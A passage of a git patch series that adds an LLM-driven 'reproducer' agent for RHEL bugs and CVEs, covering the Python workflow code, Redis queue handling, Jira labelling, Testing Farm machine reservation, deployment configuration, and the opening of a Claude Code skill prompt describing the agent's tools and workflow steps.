attaches crash-recovery reservation tracking - Structured output: parses LLM response into ReproducerOutputSchema - Retry logic: up to 3 attempts on transient LLM/tool failures - Jira lifecycle labels: marks issues through queued → in-progress → done/failed/error states Co-Authored-By: Claude Opus 4.6 --- ymir/agents/reproducer_agent.py | 516 ++++++++++++++++++++++++++++++++ 1 file changed, 516 
insertions(+)
 create mode 100644 ymir/agents/reproducer_agent.py

diff --git a/ymir/agents/reproducer_agent.py b/ymir/agents/reproducer_agent.py
new file mode 100644
index 00000000..2d545f64
--- /dev/null
+++ b/ymir/agents/reproducer_agent.py
@@ -0,0 +1,543 @@
+import asyncio
+import logging
+import os
+import sys
+import traceback
+from textwrap import dedent
+
+from beeai_framework.agents.requirement.requirements.conditional import (
+    ConditionalRequirement,
+)
+from beeai_framework.errors import FrameworkError
+from beeai_framework.memory import UnconstrainedMemory
+from beeai_framework.middleware.trajectory import GlobalTrajectoryMiddleware
+from beeai_framework.tools.think import ThinkTool
+from beeai_framework.utils.strings import to_json
+from beeai_framework.workflows import Workflow
+from pydantic import BaseModel, Field
+
+import ymir.agents.tasks as tasks
+from ymir.agents.observability import setup_observability
+from ymir.agents.reasoning_agent import ReasoningAgent
+from ymir.agents.tf_cleanup_middleware import TFReservationCleanupMiddleware
+from ymir.agents.utils import (
+    build_agent_factory_with_mock_repos,
+    get_agent_execution_config,
+    get_chat_model,
+    get_tool_call_checker_config,
+    init_sentry,
+    is_reasoning_enabled,
+    mcp_tools,
+    render_template,
+    resolve_chat_model_override,
+)
+from ymir.common.base_utils import fix_await, redis_client
+from ymir.common.constants import JiraLabels, RedisQueues
+from ymir.common.logging_setup import configure_logging
+from ymir.common.mock_repos import get_mock_local_tool_env
+from ymir.common.models import (
+    ErrorData,
+    Task,
+)
+from ymir.common.models import (
+    ReproducerInputSchema as InputSchema,
+)
+from ymir.common.models import (
+    ReproducerOutputSchema as OutputSchema,
+)
+from ymir.tools.unprivileged.commands import RunShellCommandTool
+from ymir.tools.unprivileged.text import CreateTool, SearchTextTool, ViewTool
+from ymir.tools.unprivileged.version_mapper import VersionMapperTool
+
+logger = logging.getLogger(__name__)
+redis_logger = logging.getLogger("agent.redis")
+
+_REPRODUCER_TERMINAL_LABELS = {
+    JiraLabels.REPRODUCER_CREATED.value,
+    JiraLabels.REPRODUCER_FAILED.value,
+    JiraLabels.REPRODUCER_ERRORED.value,
+    JiraLabels.REPRODUCER_NOT_REPRODUCIBLE.value,
+}
+
+_PROMPT_TEMPLATE = "reproducer/prompt.j2"
+
+
+# MCP tool names the reproducer agent needs access to
+_REPRODUCER_MCP_TOOLS = [
+    "get_jira_details",
+    "get_patch_from_url",
+    "get_maintainer_rules",
+    "clone_repository",
+    "fork_repository",
+    "push_to_remote_repository",
+    "open_merge_request",
+    "add_merge_request_labels",
+    "reserve_testing_farm_machine",
+    "get_testing_farm_reservation_details",
+    "cancel_testing_farm_request",
+    "run_remote_command",
+    "copy_files_to_remote",
+]
+
+
+class ReproducerState(BaseModel):
+    """Workflow state: the Jira issue key and the agent's parsed output."""
+    jira_issue: str
+    result: OutputSchema | None = Field(default=None)
+
+
+def create_reproducer_agent(gateway_tools, local_tool_options=None, extra_middlewares=None) -> ReasoningAgent:
+    """Build the ReasoningAgent that drives a reproducer run.
+
+    Args:
+        gateway_tools: Tools offered by the MCP gateway; only those named in
+            ``_REPRODUCER_MCP_TOOLS`` are handed to the agent.
+        local_tool_options: Optional options for the local shell/file tools;
+            when falsy the tools are created with their defaults.
+        extra_middlewares: Optional middlewares appended after the global
+            trajectory middleware.
+    """
+    middlewares = [GlobalTrajectoryMiddleware(pretty=True)]
+    if extra_middlewares:
+        middlewares.extend(extra_middlewares)
+    return ReasoningAgent(
+        name="ReproducerAgent",
+        llm=get_chat_model(),
+        unconstrained=is_reasoning_enabled(),
+        tool_call_checker=get_tool_call_checker_config(),
+        tools=[
+            ThinkTool(),
+            RunShellCommandTool(options=local_tool_options) if local_tool_options else RunShellCommandTool(),
+            VersionMapperTool(),
+            CreateTool(options=local_tool_options) if local_tool_options else CreateTool(),
+            ViewTool(options=local_tool_options) if local_tool_options else ViewTool(),
+            SearchTextTool(options=local_tool_options) if local_tool_options else SearchTextTool(),
+        ]
+        + [t for t in gateway_tools if t.name in _REPRODUCER_MCP_TOOLS],
+        memory=UnconstrainedMemory(),
+        requirements=[
+            ConditionalRequirement(
+                ThinkTool,
+                force_at_step=1,
+                consecutive_allowed=False,
+                only_success_invocations=False,
+            ),
+            ConditionalRequirement("get_jira_details", min_invocations=1),
+            ConditionalRequirement("get_maintainer_rules", only_after=["get_jira_details"]),
+            ConditionalRequirement(RunShellCommandTool, only_after=["get_jira_details"]),
+            ConditionalRequirement("get_patch_from_url", only_after=["get_jira_details"]),
+            ConditionalRequirement("clone_repository", only_after=["get_jira_details"]),
+            ConditionalRequirement("reserve_testing_farm_machine", only_after=["get_jira_details"]),
+        ],
+        middlewares=middlewares,
+        role="Red Hat Enterprise Linux developer",
+        instructions=[
+            "Do not perform root cause analysis or source code tracing — use the provided triage summary.",
+            "Always return the Testing Farm machine by calling cancel_testing_farm_request "
+            "when done, even if the reproducer failed.",
+            "When constructing patch URLs for upstream commits, always use https://. "
+            "If https:// fails when validating the patch with get_patch_from_url, "
+            "retry with http:// instead.",
+            "Never use shallow clones (--depth) when cloning upstream repositories.",
+        ],
+    )
+
+
+class _PromptContext(InputSchema):
+    """Combined context for reproducer prompt template rendering.
+
+    Extends the input schema with ``dry_run`` so the template can branch
+    on it. Defined at module level to avoid re-creating the class on every
+    ``_render_prompt`` call.
+    """
+
+    dry_run: bool = Field(default=False)
+
+
+def _render_prompt(input_data: InputSchema, dry_run: bool = False) -> str:
+    """Render the reproducer prompt template with the input schema fields."""
+    context = _PromptContext(**input_data.model_dump(), dry_run=dry_run)
+    return render_template(_PROMPT_TEMPLATE, context)
+
+
+def _determine_result_label(result: OutputSchema) -> JiraLabels:
+    """Map reproducer output to the appropriate Jira label."""
+    if result.success:
+        return JiraLabels.REPRODUCER_CREATED
+    if result.not_reproducible_reason:
+        return JiraLabels.REPRODUCER_NOT_REPRODUCIBLE
+    return JiraLabels.REPRODUCER_FAILED
+
+
+async def run_workflow(
+    jira_issue: str,
+    dry_run: bool,
+    reproducer_agent_factory,
+    input_data: InputSchema | None = None,
+    user_triggered: bool = False,
+):
+    """Run the reproducer workflow for one Jira issue and return its state.
+
+    The agent step parses the model's answer into ``OutputSchema``; the
+    follow-up step updates Jira labels and posts a comment unless
+    ``dry_run`` is set. ``tf_cleanup.cleanup()`` is awaited in a ``finally``
+    block, so it runs whether the workflow finished or raised.
+    """
+    local_tool_options = None
+    if mock_env := get_mock_local_tool_env(jira_issue):
+        local_tool_options = {"env": mock_env}
+
+    async with mcp_tools(os.getenv("MCP_GATEWAY_URL"), call_meta={"jira_issue": jira_issue}) as gateway_tools:
+        tf_cleanup = TFReservationCleanupMiddleware()
+        reproducer_agent = reproducer_agent_factory(
+            gateway_tools, local_tool_options, extra_middlewares=[tf_cleanup]
+        )
+
+        workflow = Workflow(ReproducerState, name="ReproducerWorkflow")
+
+        async def run_reproducer_analysis(state):
+            """Run the reproducer agent."""
+            logger.info(f"Running reproducer analysis for {state.jira_issue}")
+
+            agent_input = InputSchema(jira_issue=state.jira_issue) if input_data is None else input_data
+
+            output_schema_json = to_json(
+                OutputSchema.model_json_schema(mode="validation"),
+                indent=2,
+                sort_keys=False,
+            )
+            # In the f-string below "{{" and "}}" render as literal braces.
+            response = await reproducer_agent.run(
+                _render_prompt(agent_input, dry_run=dry_run),
+                expected_output=dedent(
+                    f"""
+                    The final answer must be a JSON object matching the ReproducerOutputSchema.
+
+                    **Important Formatting Rules:**
+                    - The output must be a JSON object with the following keys:
+                      `jira_issue`, `success`, `reproducer_type`, `test_mr_url`,
+                      `testing_farm_request_id`, `pass_fail_criteria`, `summary`,
+                      `not_reproducible_reason`.
+                    - All string fields must be actual strings, not nested objects.
+
+                    **Example for a successful reproducer:**
+                    ```json
+                    {{
+                        "jira_issue": "RHEL-12345",
+                        "success": true,
+                        "reproducer_type": "cve",
+                        "test_mr_url": "https://gitlab.com/redhat/rhel/tests/ksh/-/merge_requests/123",
+                        "testing_farm_request_id": "tf-request-abc123",
+                        "pass_fail_criteria": "PASS: program exits 0. FAIL: program crashes with SIGSEGV.",
+                        "summary": "Created reproducer for CVE-2025-12345 in libfoo.",
+                        "not_reproducible_reason": null
+                    }}
+                    ```
+
+                    **Example for a non-reproducible result:**
+                    ```json
+                    {{
+                        "jira_issue": "RHEL-12345",
+                        "success": false,
+                        "reproducer_type": "bug",
+                        "test_mr_url": null,
+                        "testing_farm_request_id": "tf-request-xyz789",
+                        "pass_fail_criteria": "PASS: command completes within 10s. FAIL: command hangs.",
+                        "summary": "Investigated RHEL-12345 but could not reproduce the bug.",
+                        "not_reproducible_reason": "Race condition requires specific timing."
+                    }}
+                    ```
+
+                    ```json
+                    {output_schema_json}
+                    ```
+                    """
+                ),
+                **get_agent_execution_config(),
+            )
+            state.result = OutputSchema.model_validate_json(response.last_message.text)
+
+            # Normalize jira_issue to upper-case
+            state.result.jira_issue = state.result.jira_issue.upper()
+
+            return "handle_results"
+
+        async def handle_results(state):
+            """Set Jira labels and post a comment based on the result."""
+            result = state.result
+            logger.info(
+                f"Reproducer result for {state.jira_issue}: "
+                f"success={result.success}, type={result.reproducer_type}"
+            )
+
+            if dry_run:
+                logger.info(f"Dry run — skipping Jira updates for {state.jira_issue}")
+                return Workflow.END
+
+            # Build a human-readable comment
+            comment_parts = []
+            if result.success:
+                comment_parts.append("*Resolution*: reproduced")
+            elif result.not_reproducible_reason:
+                comment_parts.append("*Resolution*: not-reproducible")
+            else:
+                comment_parts.append("*Resolution*: error")
+
+            comment_parts.append(f"*Reproducer Type*: {result.reproducer_type}")
+
+            if result.testing_farm_request_id:
+                comment_parts.append(f"*Testing Farm Request*: {result.testing_farm_request_id}")
+
+            if result.test_mr_url:
+                comment_parts.append(f"*Test MR*: {result.test_mr_url}")
+
+            comment_parts.append(f"\n*Pass/Fail Criteria*:\n{result.pass_fail_criteria}")
+            comment_parts.append(f"\n*Summary*:\n{result.summary}")
+
+            if result.not_reproducible_reason:
+                comment_parts.append(
+                    f"\n*Not Reproducible Reason*:\n{result.not_reproducible_reason}"
+                )
+
+            comment_text = "\n".join(comment_parts)
+
+            result_label = _determine_result_label(result)
+            await tasks.set_jira_labels(
+                jira_issue=state.jira_issue,
+                labels_to_add=[result_label.value],
+                labels_to_remove=[JiraLabels.REPRODUCER_IN_PROGRESS.value],
+                dry_run=dry_run,
+                user_triggered=user_triggered,
+            )
+
+            await tasks.comment_in_jira(
+                jira_issue=state.jira_issue,
+                agent_type="Reproducer",
+                comment_text=comment_text,
+                available_tools=gateway_tools,
+                user_triggered=user_triggered,
+            )
+            return Workflow.END
+
+        workflow.add_step("run_reproducer_analysis", run_reproducer_analysis)
+        workflow.add_step("handle_results", handle_results)
+
+        try:
+            response = await workflow.run(ReproducerState(jira_issue=jira_issue))
+            return response.state
+        finally:
+            await tf_cleanup.cleanup()
+
+
+async def main() -> None:
+    """Run once for ``JIRA_ISSUE`` or consume reproducer tasks from Redis.
+
+    Direct mode handles the issue named by the ``JIRA_ISSUE`` environment
+    variable and returns. Queue mode loops forever: it pops tasks from the
+    reproducer queues, skips non-user-triggered issues that already carry a
+    terminal label, and re-queues failed tasks up to ``MAX_RETRIES`` attempts.
+    """
+    init_sentry()
+
+    configure_logging(level=logging.INFO)
+    resolve_chat_model_override("reproducer")
+
+    span_processor = setup_observability(os.environ["COLLECTOR_ENDPOINT"])
+
+    dry_run = os.getenv("DRY_RUN", "False").lower() == "true"
+
+    if jira_issue := os.getenv("JIRA_ISSUE", None):
+        logger.info("Running in direct mode with environment variable")
+        with span_processor.start_transaction(jira_issue, workflow="reproducer"):
+            agent_factory = build_agent_factory_with_mock_repos(create_reproducer_agent, jira_issue)
+            state = await run_workflow(
+                jira_issue,
+                dry_run,
+                agent_factory,
+            )
+            logger.info(f"Direct run completed: {state.result.model_dump_json(indent=4)}")
+        return
+
+    logger.info("Starting reproducer agent in queue mode")
+    async with redis_client(os.environ["REDIS_URL"]) as redis:
+        max_retries = int(os.getenv("MAX_RETRIES", 3))
+        redis_logger.info(f"Connected to Redis, max retries set to {max_retries}")
+
+        while True:
+            redis_logger.info("Waiting for tasks from reproducer_queue (timeout: 30s)...")
+            element = await fix_await(
+                redis.brpop(
+                    [RedisQueues.REPRODUCER_QUEUE_TODO.value, RedisQueues.REPRODUCER_QUEUE.value],
+                    timeout=30,
+                )
+            )
+            if element is None:
+                redis_logger.info("No tasks received, continuing to wait...")
+                continue
+
+            _, payload = element
+            redis_logger.info("Received task from queue")
+
+            task = Task.model_validate_json(payload)
+            input_data = InputSchema.model_validate(task.metadata)
+            user_triggered = task.user_triggered
+            logger.info(
+                f"Processing reproducer for JIRA issue: {input_data.jira_issue}, "
+                f"attempt: {task.attempts + 1}"
+                + (" (user-triggered)" if user_triggered else "")
+            )
+
+            # Duplicate-processing guard: skip if the issue already has a
+            # reproducer-terminal label and is not currently in-progress or
+            # user-triggered (which always gets a fresh run).
+            current_labels = await tasks.get_jira_labels(input_data.jira_issue)
+            terminal_ymir_labels = [
+                label
+                for label in current_labels
+                if label in _REPRODUCER_TERMINAL_LABELS
+            ]
+            if (
+                terminal_ymir_labels
+                and JiraLabels.REPRODUCER_IN_PROGRESS.value not in current_labels
+                and not user_triggered
+            ):
+                logger.info(
+                    f"Skipping duplicate reproducer for {input_data.jira_issue} — "
+                    f"already has labels: {terminal_ymir_labels}"
+                )
+                continue
+
+            async def retry(task, error, input_data=input_data, user_triggered=user_triggered):
+                """Re-queue the task, or record the error once retries are exhausted."""
+                task.attempts += 1
+                if task.attempts < max_retries:
+                    logger.warning(
+                        f"Task failed (attempt {task.attempts}/{max_retries}), "
+                        f"re-queuing for retry: {input_data.jira_issue}"
+                    )
+                    retry_queue = (
+                        RedisQueues.REPRODUCER_QUEUE_TODO.value
+                        if task.user_triggered
+                        else RedisQueues.REPRODUCER_QUEUE.value
+                    )
+                    await fix_await(redis.lpush(retry_queue, task.model_dump_json()))
+                else:
+                    logger.error(
+                        f"Task failed after {max_retries} attempts, "
+                        f"moving to error list: {input_data.jira_issue}"
+                    )
+                    try:
+                        await tasks.set_jira_labels(
+                            jira_issue=input_data.jira_issue,
+                            labels_to_add=[JiraLabels.REPRODUCER_ERRORED.value],
+                            labels_to_remove=[JiraLabels.REPRODUCER_IN_PROGRESS.value],
+                            dry_run=dry_run,
+                            user_triggered=user_triggered,
+                        )
+                    except Exception as label_error:
+                        logger.warning(
+                            f"Failed to set error labels on {input_data.jira_issue}: {label_error}"
+                        )
+                    await fix_await(redis.lpush(RedisQueues.ERROR_LIST.value, error))
+
+            # ymir_reproducer_in_progress is the dedup anchor for the next
+            # fetcher sweep. If we cannot write it, we must not proceed —
+            # otherwise the fetcher will re-enqueue this issue and a second
+            # reproducer will run in parallel.
+            try:
+                await tasks.set_jira_labels(
+                    jira_issue=input_data.jira_issue,
+                    labels_to_add=[JiraLabels.REPRODUCER_IN_PROGRESS.value],
+                    labels_to_remove=[
+                        label
+                        for label in JiraLabels.all_labels()
+                        if label != JiraLabels.REPRODUCER_IN_PROGRESS.value
+                    ],
+                    dry_run=dry_run,
+                    user_triggered=user_triggered,
+                    critical=True,
+                )
+                logger.info(f"Cleaned up existing labels for {input_data.jira_issue}")
+                # Post acknowledgement comment for user-triggered runs now that
+                # the in-progress label write succeeded. This prevents duplicate
+                # comments if the critical label write were to fail.
+                await tasks.post_user_ack_once(
+                    task=task,
+                    jira_issue=input_data.jira_issue,
+                    agent_type="Reproducer",
+                    comment_text=(
+                        "Ymir picked up your request and started processing. "
+                        "Results will be posted here when reproducer analysis completes."
+                    ),
+                    user_triggered=user_triggered,
+                    dry_run=dry_run,
+                )
+            except Exception as e:
+                logger.error(
+                    f"Could not set {JiraLabels.REPRODUCER_IN_PROGRESS.value} on "
+                    f"{input_data.jira_issue} after retries: {e}; re-queuing to avoid duplicate reproducer."
+                )
+                error_msg = f"Failed to set in-progress label: {e}"
+                error_data = ErrorData(details=error_msg, jira_issue=input_data.jira_issue)
+                await retry(task, error_data.model_dump_json())
+                # Long sleep on purpose: critical-write retries already burned
+                # ~7s, so we're past transient blips. Typical Jira outages last
+                # minutes; cycling faster just spams the API.
+                await asyncio.sleep(60)
+                continue
+
+            try:
+                logger.info(f"Starting reproducer processing for {input_data.jira_issue}")
+                with span_processor.start_transaction(
+                    input_data.jira_issue, workflow="reproducer"
+                ):
+                    state = await run_workflow(
+                        input_data.jira_issue,
+                        dry_run,
+                        create_reproducer_agent,
+                        input_data=input_data,
+                        user_triggered=user_triggered,
+                    )
+                    output = state.result
+                    logger.info(
+                        f"Reproducer processing completed for {input_data.jira_issue}, "
+                        f"success: {output.success}"
+                    )
+
+            except Exception as e:
+                error = "".join(traceback.format_exception(e))
+                logger.error(
+                    f"Exception during reproducer processing for "
+                    f"{input_data.jira_issue}: {error}"
+                )
+                await retry(
+                    task,
+                    ErrorData(
+                        details=error, jira_issue=input_data.jira_issue
+                    ).model_dump_json(),
+                )
+            else:
+                logger.info(
+                    f"Reproducer resolved as success={output.success} "
+                    f"for {input_data.jira_issue}"
+                )
+
+                # Push the completed result to the completed list
+                await fix_await(
+                    redis.lpush(
+                        RedisQueues.COMPLETED_REPRODUCER_LIST.value,
+                        output.model_dump_json(),
+                    )
+                )
+                logger.info(
+                    f"Pushed {input_data.jira_issue} to "
+                    f"{RedisQueues.COMPLETED_REPRODUCER_LIST.value}"
+                )
+
+
+if __name__ == "__main__":
+    try:
+        asyncio.run(main())
+    except FrameworkError as e:
+        traceback.print_exc()
+        sys.exit(e.explain())

From e93edb388930e5a8179050fd99abc77efeb2e9dd Mon Sep 17 00:00:00 2001
From: Vincent Mihalkovic
Date: Thu, 18 Jun 2026 09:57:25 +0200
Subject: [PATCH 14/16] Add reproducer agent deployment configuration

- compose.yaml: Add the reproducer-agent service and the
  reproducer-agent-e2e-tests service (mock-repos volume and
  REPRODUCER_MOCK_REPOS_DIR)
- Makefile: Add the run-reproducer-agent-e2e-tests and
  run-reproducer-agent-standalone targets
- .gitignore: Keep the reproducer mock_repos directory tracked while
  ignoring its contents
- templates/beeai-agent.env: Document the CHAT_MODEL_REPRODUCER override

Co-Authored-By: Claude Opus 4.6
---
 .gitignore | 2 ++
 Makefile | 16 ++++++++++++++++
 compose.yaml
| 20 ++++++++++++++++++++ templates/beeai-agent.env | 1 + 4 files changed, 39 insertions(+) diff --git a/.gitignore b/.gitignore index 32cce219..487c7e76 100644 --- a/.gitignore +++ b/.gitignore @@ -54,8 +54,10 @@ ymir/agents/tests/e2e/mock_repos/* !ymir/agents/tests/e2e/mock_repos/README.md !ymir/agents/tests/e2e/mock_repos/triage/ !ymir/agents/tests/e2e/mock_repos/backport/ +!ymir/agents/tests/e2e/mock_repos/reproducer/ ymir/agents/tests/e2e/mock_repos/triage/* ymir/agents/tests/e2e/mock_repos/backport/* +ymir/agents/tests/e2e/mock_repos/reproducer/* # E2E test output artifacts ymir/agents/tests/e2e/test_output/ diff --git a/Makefile b/Makefile index a91f4a22..42f8b73e 100644 --- a/Makefile +++ b/Makefile @@ -62,6 +62,22 @@ run-backport-agent-e2e-tests: backport-agent-e2e-tests +.PHONY: run-reproducer-agent-e2e-tests +run-reproducer-agent-e2e-tests: + $(COMPOSE) -f $(COMPOSE_FILE) --profile=e2e-test run --rm \ + -e MOCK_JIRA="true" \ + -e DRY_RUN="true" \ + reproducer-agent-e2e-tests + +.PHONY: run-reproducer-agent-standalone +run-reproducer-agent-standalone: + $(COMPOSE_AGENTS) run --rm \ + -e JIRA_ISSUE=$(JIRA_ISSUE) \ + -e DRY_RUN=$(DRY_RUN) \ + -e MOCK_JIRA=$(MOCK_JIRA) \ + -e JIRA_DRY_RUN=$(JIRA_DRY_RUN) \ + reproducer-agent + .PHONY: run-rebase-agent-c9s-standalone run-rebase-agent-c9s-standalone: $(COMPOSE_AGENTS) run --rm \ diff --git a/compose.yaml b/compose.yaml index 27e2c305..cb57402f 100644 --- a/compose.yaml +++ b/compose.yaml @@ -230,6 +230,26 @@ services: restart: "no" profiles: ["e2e-test"] + reproducer-agent-e2e-tests: + <<: *beeai-agent-c10s + environment: + <<: *beeai-env + REPRODUCER_MOCK_REPOS_DIR: /home/beeai/mock_repos/reproducer + volumes: + - ./ymir:/home/beeai/ymir:ro,z + - git-repos:/git-repos:rw,U + - .secrets/rhel-config.json:/home/beeai/rhel-config.json:ro,z,U + - .secrets/jotnar-vertex-dev.json:/home/beeai/jotnar-vertex-dev.json:ro,z,U + - ${MOCK_REPOS_HOST:-./ymir/agents/tests/e2e/mock_repos}:/home/beeai/mock_repos:ro,z + command: 
["pytest", "ymir/agents/tests/e2e/reproducer_agent/test_reproducer.py", "-o", "asyncio_default_test_loop_scope=session"] + restart: "no" + profiles: ["e2e-test"] + + reproducer-agent: + <<: *beeai-agent-c10s + command: ["python", "-m", "ymir.agents.reproducer_agent"] + profiles: ["agents"] + backport-agent-c9s: <<: *beeai-agent-c9s command: ["python", "-m", "ymir.agents.backport_agent"] diff --git a/templates/beeai-agent.env b/templates/beeai-agent.env index 8650ba19..a8bf24af 100644 --- a/templates/beeai-agent.env +++ b/templates/beeai-agent.env @@ -27,6 +27,7 @@ CHAT_MODEL= # CHAT_MODEL_BACKPORT= # CHAT_MODEL_REBASE= # CHAT_MODEL_REBUILD= +# CHAT_MODEL_REPRODUCER= # One of: none, minimal, low, medium, high; defaults to none REASONING_EFFORT=high From f74052af73f56f8b50b11f451b8712dacc6ca734 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:57:29 +0200 Subject: [PATCH 15/16] Add reproducer agent skill definition SKILL.md that registers the reproducer as a Claude Code slash-command skill. Defines the input schema (Jira issue key), required environment variables, and invocation instructions for running the reproducer through the Claude Code CLI. Co-Authored-By: Claude Opus 4.6 --- agents_as_skills/reproducer/SKILL.md | 722 +++++++++++++++++++++++++++ 1 file changed, 722 insertions(+) create mode 100644 agents_as_skills/reproducer/SKILL.md diff --git a/agents_as_skills/reproducer/SKILL.md b/agents_as_skills/reproducer/SKILL.md new file mode 100644 index 00000000..9958157d --- /dev/null +++ b/agents_as_skills/reproducer/SKILL.md @@ -0,0 +1,722 @@ +--- +name: reproducer +description: Create minimal, automated reproducers for RHEL bugs and CVEs — design tests, verify on Testing Farm machines, and publish merge requests to the RHEL tests repository. +--- + +# Reproducer Skill + +You are a Red Hat Enterprise Linux developer tasked with creating a minimal, automated reproducer for a bug or CVE described in a Jira issue. 
Your goal is to create a test that objectively demonstrates the bug, verify it on a real RHEL system via Testing Farm, and publish the result. + +You receive your understanding of the bug from the inputs: the Jira issue description, `triage_summary`, `patch_urls`, and `cve_id`. Do NOT perform root cause analysis, source code tracing, or upstream fix hunting. Use the provided `triage_summary` and Jira issue description to understand the bug. + +## Input Arguments + +- `jira_issue`: {{jira_issue}} +- `package`: {{package}} +- `cve_id`: {{cve_id}} +- `patch_urls`: {{patch_urls}} +- `triage_summary`: {{triage_summary}} +- `fix_version`: {{fix_version}} +- `target_branch`: {{target_branch}} +- `dry_run`: {{dry_run}} + +## Tools + +This skill uses the following tools. Do not restrict tool usage — use any tool available as needed. + +**MCP Tools (called via MCP gateway):** +- `get_jira_details` — Get full details of a JIRA issue (fields, comments, links) +- `get_patch_from_url` — Fetch patch/commit content from a URL and return the raw diff (used to read `patch_urls` provided by the caller, NOT for searching for new patches) +- `get_maintainer_rules` — Get maintainer-specific rules and guidelines for a package +- `clone_repository` — Clone a Git repository to a local path +- `fork_repository` — Fork a Git repository (used for MR creation) +- `push_to_remote_repository` — Push a branch to a remote repository +- `open_merge_request` — Open a merge request from a fork against its original repository +- `add_merge_request_labels` — Add labels to a merge request +- `reserve_testing_farm_machine` — Reserve a Testing Farm machine with SSH access +- `get_testing_farm_reservation_details` — Get status and SSH details of a TF reservation +- `cancel_testing_farm_request` — Cancel/release a Testing Farm reservation +- `run_remote_command` — Execute a command on a remote machine via SSH +- `copy_files_to_remote` — Copy files to a remote machine via SCP + +**Local Tools (filesystem, 
git, analysis):** +- `map_version` — Map RHEL major version to current Y-stream and Z-stream versions. Input: `major_version` (integer, e.g. 9 or 10). Returns `y_stream`, `z_stream`, and `is_maintenance_version`. +- `run_shell_command` — Execute shell commands (git operations, searching) +- `view` — View file or directory contents +- `search_text` — Search for text patterns in files +- `create` — Create new files + +**Other:** +- Bash tool for shell commands (e.g., `git log`, `grep`) + +## Critical Rules + +- **NEVER use direct `git clone` commands.** Always use the `clone_repository` MCP tool for cloning repositories. +- **Do NOT perform root cause analysis, source code tracing, or upstream fix hunting.** Use the provided `triage_summary` and Jira issue description to understand the bug. + +## Reproducer Design Principles + +Every reproducer created by this agent must follow these principles: + +1. **Minimal**: The smallest script that still hits the same code path. Drop unrelated environment setup, users, networks, and configuration. If the bug can be triggered with a three-line input file, do not use a fifty-line one. + +2. **Non-interactive**: Shell script (`.sh`, `.ksh`), one-liner file, or documented `shell -c '...'`. No prompts, no user interaction, no GUI dependencies. + +3. **Heavy setups**: If the bug requires a VM, network topology, or multi-service environment, try to simulate the same failure with a local file, small input, or reduced command sequence first. If that is impossible, state "reproducer blocked" and document what is missing. + +4. **Objective pass/fail**: The reproducer must have a machine-readable pass/fail criterion. 
Acceptable methods include: + - Exit code (0 = PASS, non-zero = FAIL) + - Exact string match or empty capture vs expected output + - Valgrind: `LEAK SUMMARY` lines with `--errors-for-leak-kinds=definite,indirect --error-exitcode=1` so the process exits non-zero on leaks + - Timeout vs hang (document the timeout value explicitly) + - Signal-based detection (e.g., SIGSEGV, SIGABRT for crash bugs) + +5. **Automation-ready**: The reproducer must work with `git bisect run` and CI pipelines. No hardcoded paths, no assumptions about the user's environment beyond the target RHEL version. + +## Workflow + +Execute the following steps in order. Track state across steps using these variables: + +- `package_name` — the RPM package name (null initially) +- `maintainer_rules` — package-specific rules from maintainer (null initially) +- `jira_data` — full Jira issue data (null initially) +- `tf_request_id` — Testing Farm reservation request ID (null initially) +- `ssh_connection` — SSH connection string for the reserved machine, e.g. `root@1.2.3.4` (null initially) +- `test_dir` — local path to the test directory created in the tests repo clone (null initially) +- `tests_clone` — path to cloned `gitlab.com/redhat/rhel/tests/` repository (null initially) +- `reproducer_verified` — whether the reproducer was successfully verified on TF machine (false initially) +- `iteration_count` — number of verification loop iterations completed (0 initially) +- `merge_request_url` — URL of the created MR in the tests repo (null initially) +- `not_reproducible_reason` — reason the bug could not be reproduced (null initially) + +--- + +### Step 1: Get Jira Issue, Check Package Exists + +1. Call `get_jira_details` with `issue_key` = `{{jira_issue}}`. +2. Save the full result as `jira_data`. 
Extract key details: + - Title, description, and all comments + - Component name (this is the package name unless `{{package}}` is provided) + - Fix version from `fields.fixVersions[0].name` (if present) + - Any reproducer steps, error messages, or log snippets mentioned in the issue + +3. Determine the package name: + - If `{{package}}` is provided, use it as `package_name`. + - Otherwise, extract the component name from `jira_data` and use it as `package_name`. + +4. Confirm the package repository exists by running: + ``` + GIT_TERMINAL_PROMPT=0 git ls-remote https://gitlab.com/redhat/centos-stream/rpms/<package_name> + ``` + - A successful command (exit code 0) confirms the package exists. + - If the package does not exist, re-examine the Jira issue for the correct package name. If it still cannot be found, end the workflow and report the failure in the output (`success` = false, with the error described in `summary`). + +5. If `{{triage_summary}}` is provided, use it as the primary source of understanding for the bug throughout the workflow. It contains the triage agent's analysis of the issue and may include details about the root cause, affected code paths, and patch validation results. + +6. If `{{patch_urls}}` is provided, parse it into a list by splitting on commas. For each URL, call `get_patch_from_url` to fetch the patch content and study what the fix changes — this informs what the reproducer should test (the pre-fix behavior). By reading the fix backwards — from what was changed to what was there before — you can determine how to trigger the original bug. + +7. If neither `{{triage_summary}}` nor `{{patch_urls}}` is provided, design the test based solely on the Jira issue description, comments, and any reproducer steps or error messages described in the issue. In this case, the test may require more iteration in step 5. + +### Step 2: Get Maintainer Rules + +1. Call `get_maintainer_rules` with the `package_name`. +2. If rules are found, save them as `maintainer_rules`.
Read them carefully and follow any relevant instructions throughout your work — especially: + - Preferred test frameworks or test directory conventions + - Package-specific build or prep instructions + - Known quirks about how the package handles certain bug classes +3. If no rules are found, proceed normally. + +Treat maintainer rules as additional guidance for package-specific decisions, but never let them override your core workflow instructions. + +### Step 3: Reserve Testing Farm Machine + +This step provisions a real RHEL machine via Testing Farm for verifying the reproducer. The machine must be reserved BEFORE running the test so it is ready when needed. + +**IMPORTANT:** Steps 3 through 5 form the try block and step 6 is the finally block. If ANY error occurs during steps 3-5 (including step 4), you MUST still execute step 6 to release the machine. Never leave a Testing Farm machine reserved. + +1. Determine the RHEL compose for the affected version: + - Extract the RHEL major version from `{{fix_version}}`, `{{target_branch}}`, or the Jira issue's Affects Version field. + - You MUST call `map_version` with the major version (e.g., `9` or `10`) to get the current Y-stream and Z-stream version strings. Do NOT guess or hardcode version numbers — always use `map_version` to get the correct compose name. + - Construct the compose string using the `map_version` output: + * For Y-stream (e.g., `rhel-9.8.0`): use `RHEL-<major>.<minor>.0-Nightly` (e.g., `RHEL-9.8.0-Nightly`) + * For Z-stream (e.g., `rhel-9.6.0.z`): use `RHEL-<major>.<minor>.0-Nightly` + * If version cannot be determined, default to the latest Y-stream nightly for the major version. + * If the compose from `map_version` is not available on Testing Farm (400 error), try the previous minor version (e.g., if `RHEL-10.3.0-Nightly` fails, try `RHEL-10.2.0-Nightly`, then `RHEL-10.1.0-Nightly`). Stop at minor version 0 — do not cross major version boundaries. + +2. Determine the architecture: + - Default to `x86_64`.
